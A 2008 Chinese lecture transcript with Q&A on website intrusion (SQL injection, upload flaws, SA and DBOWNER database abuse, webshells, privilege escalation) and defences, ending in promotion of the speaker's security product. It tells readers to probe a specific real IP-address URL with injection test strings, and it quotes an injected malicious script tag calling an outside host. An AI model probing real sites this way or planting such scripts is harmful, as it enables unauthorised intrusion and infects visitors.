中国红盟刘庆:黑客入侵手段与防御攻略
点击次数:27 次 发布日期:2008-12-31 15:06:43 作者:源代码网
|
今天我们主要是给大家进行安全方面的讲座,黑客技术方面我们不会着重来讲,主要是让大家知道黑客的入侵手段,然后我们可以有效的去防御他们。 一、黑客的入侵手段? 现在黑客进行网站入侵的第一种技术就是注入攻击,包括服务器的一些较为流行的攻防技术。在讲解网站安全攻防技术之前,我想做个调查:现在大家在运营自己的网站的时候,遇到过黑客入侵过的站长请按1,没有请按2……哇,居然有这么多被黑客入侵过的朋友,那我想今天大家来对了。 现在黑客进行网站入侵的第一种技术就是注入攻击,这是一种很多网站普遍遇到的安全问题,很多网络程序员在编写网站程序的时候,都没有注意到对URL访问数据库作出限制,主要是编写动态操作数据库的ASP/ASP.NET/PHP/JSP等语言。那我举一个简单的例子大家看看这个网站 http://219.221.200.61/2004/show.asp?id=52 大家可以在这个网站网址后面加上一个单引号然后再打开看看,页面就无法显示了,然后再输入and 1=1 ,再看结果;然后再输入and 1=2 ,再看结果。如果输入and 1=1和and 1=2页面返回的结果不一样,那么就说明网站有注入漏洞。 注入漏洞的类型有好几种:包括字符型注入,搜索型注入。各种注入都是万变不离其中,都是为了列举数据库的内容,拿数据库主要就是为了进后台传WEB木马。 所以第二个黑客入侵的手段是利用上传漏洞进行入侵。上传漏洞是由于很多网站需要用户上传照片,用户资料等功能所造成的,只不过现在都要用一些专业的工具来上传,很多工具都还是可以绕过上传文件限制来传WEB木马,所以上传这一块功能方面要尽量多设置一些安全防御措施。 比如:第一,限制上传文件类型;第二,设置一个专门的上传文件夹,给这个文件夹只有查看的权限,而没有运行脚本的权限;第三,安装一些安全软件,包括杀毒软件和IPS系统之类的;第四,限制上传文件大小。 刚才 我们讲的两块主要是侧重于ASP+ACCESS方面的黑客入侵技术,下面讲的主要是侧重于 ASP+SQL的安全攻防技术。 很多条件好点的站长都有自己的服务器了,而且随着用户访问量的不断增长,很多人都改用速度更快,容量更大的SQL数据库了。因此,这方面也引起了黑客的关注。 SQL的SA帐号就是系统管理员帐号,如果黑客利用到网站的注入漏洞就很容易获取系统的最高权限,一旦黑客获取了最高权限,完全可以用NBSI等注入工具来建立系统帐号,并且利用3389端口远程登录进去,这一块的技术就是SA注入攻击方式。前几年国内外网络游戏被黑客入侵大部分都是黑客利用SA注入漏洞的技术手段来入侵的。 我们刚才讲了SQL的SA权限的入侵技术,那么SQL总共有哪几种权限呢?是不是只有SA权限是会被黑客利用的?错了,除了最高的SA权限之外,DBOWNER和PUBLIC等权限都有被黑客利用的可能。 SQL权限的高低顺序依次是SA,DBOWNER,PUBLIC。 DBOWNER这一块的黑客入侵技术主要一种方式是差异化备份技术,这是黑客利用数据库的备份功能,把一些一句话木马通过数据库备份到一个指定的目录里面 ,然后通过C/S木马上传WEB木马,然后用WEB木马来提权,获取系统权限,最后这个PUBLIC也有可能会被黑客利用,黑客利用这种权限只能列举数据库,所以这种方式黑客会列举出后台帐号和密码,然后利用后台上传WEB木马。 在这里我要告诉大家的是,黑客的入侵手段有很多种搭配方式。我们来分析一下黑客的各类入侵手段的分类。注入漏洞和上传漏洞都是入侵技术。而把权限提升为最高权限在黑客的术语中被成为提权,然后黑客拿到最高权限之后,有一部分会进行挂马,有的会去窃取网站资料,最后一步就是清除日志,这是黑客的扫尾工作。这几种方式当中的每一种都有很多个不同的入侵方式,所以可以进行自由搭配,这样延伸出来的黑客技术就会有很多种。 二、如何防御黑客的入侵? 好了,我们现在再来给大家讲解一下面对这些黑客的入侵手段,我们怎么来防御。 首先,注入漏洞这一块。我们现在有一种防御方面,我们公司自己编写了一个ASP防注入代码,把防注入代码加入到连接数据库的文件里面,就可以有效的防御大部分的注入漏洞,这个代码我明天会发给一方,一方会统一发给大家的。好,然后上传漏洞这一块我们怎么来防御呢? 第一,限制上传类型,只允许用户用到的文件类型;第二,指定一个专门的文件夹,这个文件夹里面的文件都不给脚本运行权限,这样黑客即使传了ASP木马上去,但是也不能运行,除了IIS扩展里面允许的这些扩展名之外,其它的都不能运行,黑客传上一些非ASP的文件之后,是不能正常运行的,除了IIS扩展里面允许的这些扩展名之外,其它的都不能运行,所以IIS扩展里面尽量把一些不需要的扩展名都给删除掉。 其次,对于SA注入这一块。SA注入是黑客利用SQL的最高权限SA来进行注入攻击的一种方式,刚才也讲过了SA注入攻击的一些技术方式,为了防止黑客利用SA权限进行入侵,那么所有的网站数据库都不要给SA权限,最多给一个DBOWNER权限,如何设置SQL权限?建立SQL帐号的时候就可以设置了。这个比较简单,你看看SQL数据库的操作的时候就可以看到,而且只给予访问本数据库的权限,其它的权限都不要给。对于DBOWNER和PUBLIC注入,主要把注入点屏蔽掉,这样就可以防止黑客通过数据库权限来获取系统权限,然后对于一些有服务器的网站用户来说,对于端口这一块最好要多做一些限制,除了一些系统本身所需要的端口之外,其它的端口都关闭掉,而且3389端口最好改一个,这个通过操作注册表就可以实现,这里有修改3389端口的具体方法,比较容易 。 http://hi.baidu.com/s099/blog/item/693d5dcb536dd0fa53664fc1.html 这些防御措施如果都能做好,那么就能防御大部分黑客的入侵,好了,今天的课程主要就这些,那现在我们留下一些时间来给大家进行提问。 wolf:请问刘总,如何防止整站被下载? 刘庆:可以通过一些脚本的方式来禁止一些下载的措施,但是这个不能从根本上防止黑客入侵,还有一种方式是要用IIS筛选器的方式来实现,这个就需要开发一个IIS筛选器工具来做防御。 Colin Jin:能否谈谈ddos的预防和防御方法? 刘庆:DDOS是一种洪水攻击方式,很多抗DDOS防火墙只能从一定程度上来防御,一旦带宽的大小不够DDOS的攻击流量,那抗DDOS防火墙也其不了作用。 淡定:SharpWinner提到的是Window系统的远程访问端口漏洞,如果是Linux Fedora或 Ubuntun系统呢,如果我只开通了ssh端口,也会被攻击吗? 刘庆:对于LINUX系统而言,要看你有哪些应用 ,LINUX的APACHE也是有各种安全隐患,只不过了解这一块的人比较少一些,80端口如果有一些网站方面的应用,那黑客也可以上传PHP木马,然后通过系统存在的各种应用的漏洞来提权,比如BIND服务也存在一些安全漏洞,一旦被提升权限之后,那就可以通过SSH登录进去,很多黑客都会利用一些LINUX的内核级别的木马来操作,有一点要让大家知道的是:任何系统都有漏洞,只不过是你有没有发现罢了。 蓝微客工作室:我的网站每个页面结尾都被加上这个 <script language="javascript" src="http://bobo.otzo.com/office.js?logo=630&page=217"></script> 手动删除,第二天又自动加上了。 刘庆:恩,对于一些自动被加上挂马代码的方式,那就说明你的服务器已经被黑客入侵了,最好是彻底的检测一下服务器的安全性,我们现在研发了一款防黑客入侵的产品,红盟服务器安全防御系统。 包括四大块功能:第一,安全检测功能,第二,安全处理功能,第三,安全监控功能,第四,安全日志功能。这四大块合在一起就是安全防御系统,拆分开各自都是一套独立的系统。我们的检测系统最近正在搞一个活动,可以免费给有服务器的网站站长来进行安装。 好了,今天我们就到这里。 2008年12月24日 上海站长联谊会 2009首届上海中小网站文化节 源代码网供稿. |
